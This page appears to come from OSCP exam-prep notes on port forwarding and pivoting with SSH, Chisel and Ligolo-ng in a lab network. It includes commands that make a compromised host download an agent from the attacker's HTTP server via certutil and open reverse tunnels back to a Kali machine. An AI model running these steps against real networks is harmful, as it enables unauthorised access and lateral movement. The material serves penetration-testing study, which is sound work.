📘
OSCP Exam Prep
OSCP Exam Prep
OSCP Exam Prep
  • Reference List
  • Guideline
  • Commons
    • Basic Scans
    • Service Enumeration
      • HTTP(S) (80 / 443)
      • SMB (139 / 445)
      • FTP (21)
      • DNS (53)
      • SSH (22)
      • LDAP (389/636/3268)
      • Kerberos (88)
      • SNMP (161)
      • SMTP (25)
      • RDP (3389)
      • Evil-WinRM (5985/5986)
      • MYSQL (3306)
      • MSSQL (1433)
    • Default/Common Credentials
    • Shells
      • TTY Shell
    • File Transfer
    • KeePass Database
    • Port Forwarding
    • File Metadata
  • Attacks
    • Run a command x times
    • Public Exploits
    • User Creation
    • Password Cracking
      • Using custom wordlists
    • LFI/RFI
    • SQLi
    • PwnKit
    • SAM and SYSTEM files
    • Phishing for Access (Requires MailSVR)
    • GitDumper
  • Enumeration
    • Linux
    • Windows
  • Privilege Escalation
    • Linux
    • Windows
  • Port Forwarding Extras
    • Linux
    • Windows
  • Active Directory
    • Enumeration
    • Lateral Movement
    • Privilege Escalation
Powered by GitBook
On this page
  • SSH
  • Chisel
  • Ligolo-ng
  1. Commons

Port Forwarding

Last updated 25 days ago

SSH

  • Method 1:

On Kali machine:
 sudo systemctl start ssh
 nano /etc/proxychains.conf
  # Append socks5 127.0.0.1 <port>
  # Append proxychains infront of any command targeted at the internal network moving forward

On Victim machine:
 ssh -N -R <port> kali@192.168.45.x

  • Method 2:

ssh <user>@<IP> -L <port>:127.0.0.1:<port>
 # Target 127.0.0.1:<port> to access the target machine's "hidden" port

Chisel

On Kali machine:
    ./chisel_linux server -p 8001 --reverse


On Pivot machine:
    .\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
    
    OR

    .\chisel.exe client <Kali IP>:8001 R:socks

Ligolo-ng

  1. Set up ligolo

On Kali Machine:
    sudo ip tuntap add user kali mode tun ligolo
    sudo ip link set ligolo up
    sudo ip route add <Internal net>/24 dev ligolo

    mkidr ligolo && cd ligolo
    
    mkdir proxy && cd proxy
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    mkdir ../agents && cd ../agents
    mkdir windows && cd windows
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
    unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
    
    cd ..
    
    mkdir linux && cd linux
    wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
    
    cd ..
    
    python3 -m http.server 80 

On MS01:
    certutil -urlcache -split -f http://192.168.45.200/<platform>/agent.exe

  1. Initiate tunnel

On Kali Machine (~\ligolo\proxy):
    ./proxy -selfcert
    # Take note of the port this service starts on

On MS01:
    agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
        # Default port is: 11601
    
Once Agent joins the Server, Return to Kali terminal:
    session
    <enter>
    ifconfig # Verify interfaces of agent
    start # Creates a tunnel that allows our kali to access the internal network
    
    # Add listeners based on what you want the internal network to reach you for, then they will connect to the pivot machine via specified port
    listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port> 
    listener_list # Verify listener added

  • Now you can reach the internal network directly like is just part of your network

  • Just that the internal machines are talking to your proxy (pivot point) instead of directly to you

GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTPGitHub
GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub
Logo
Logo